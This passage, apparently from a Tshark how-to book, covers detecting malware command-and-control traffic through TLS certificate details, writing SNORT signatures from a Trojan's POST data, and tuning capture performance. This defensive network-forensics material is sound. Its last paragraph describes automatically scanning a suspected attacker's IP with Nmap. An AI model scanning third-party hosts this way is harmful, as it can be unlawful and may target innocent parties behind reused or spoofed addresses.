Consider the examples seen in the Implementing useful filters (Should know) recipe to compare all domains accessed by users with a blacklist and to use a DNS PASSIVE service to get more information about suspicious IPs. In addition to these filters, there are many aspects we have to consider when looking for malware traffic. Thus, if the malware uses TLS to communicate with the C&C to evade firewalls and IDS, we can still see details such as: invalid certificates, TLS handshake failures, strange domain names, and so on (be aware that the initial part of an SSL session is not encrypted). We can even take into account information such as the size or timing of packets when we are monitoring encrypted packets (for example, very short-lived sessions of a single request followed by a reply could indicate malware activity). Also make sure that the traffic traveling through port 443 is TLS/SSL as many malware use this port to send HTTP traffic or a custom encrypted protocol (as in Aurora Operation). Take a look at the paper Detection of Web Based Command & Control Channels of Martin Warmer to see many of these patterns. (http://eprints.eemcs.utwente.nl/20941/01/MSc_M_Warmer.pdf). In the following example we can see how the certificate sent by certain host presents a suspicious CN:

bmerino@Mordor:~$ tshark -r 443.pcap -R "ssl.handshake.certificates" -T pdml  > certificates
bmerino@Mordor:~$ cat certificates | grep -i commonname -m 1 
<field name="ssl.handshake.certificate" showname="Certificate (id-at-commonName=
ERdifadjklwkrsaf.EdkjaldfkWEfd.WEdf.net
,id- 

Tshark can serve as a complement to our debugger to analyze the traffic generated by malware. The figure that follows is a code excerpt from a certain Trojan. In it we can see the assignment of certain static data to a buffer. This buffer is then sent as a POST request to a malicious domain through the API HttpSendRequest. To confirm the sending of such data, we run the sample in a Cuckoo VM several times while we leave Tshark listening.

After checking the sending of such data through the POST requests, we can use them to create a signature for SNORT and block this way any future connection from any other hosts of our network. This rule, along with the malicious domains used by the Trojan, will help us to detect not only that Trojan itself but a possible variant thereof in a preventive way. Check out the signature created based on the positions of the static data in the POST request:

Throughout this book, we have seen many examples using various parameters of Tshark. In practice, you may not remember many of these options due to the vast amount of existing parameters. Apart from using Help from the command line (-h), remember that you can take advantage of the Linux shell to permanently save many Tshark instructions, saving you a lot of time.

In this recipe we have used an interesting new parameter, -s (snaplen). With this option we will tell Tshark the amount of bytes we want to capture for each packet (instead of saving the entire content). This process, also known as PacketSlicing, will allow us to save CPU time and generate much smaller capture files. In our case, since we needed only to know the TCP flags of each packet to identify the type of scan, we specified a snaplen of 58. Remember that the Ethernet header takes 14 bytes and the IPv4 and TCP header 20 bytes each; so 58 bytes will be enough for us to reach the flags field. This is not the only way to improve the performance of Tshark. Disabling name resolution (the –n option), not putting the interface in promiscuous mode (the –p option), or incrementing the buffer size used by the capture driver (the –B option), can help us enormously when we need to capture very high amounts of packets.

Let's consider now the following scenario. During the last week we found illegitimate access to the web server. After investigating the possible cause of the intrusion, we conclude that the attacker had captured the session cookie of the Admin user to get access to the server. In addition, an incorrect session management allowed him to use that cookie permanently. To locate the attacker, we used a small Python script to notify us by mail when someone tried to use that cookie. Also, to get more information about his host, we would launch NMAP against his IP. Take a look at how we played with the Tshark output to feed both functions: send_mail and scan_Nmap.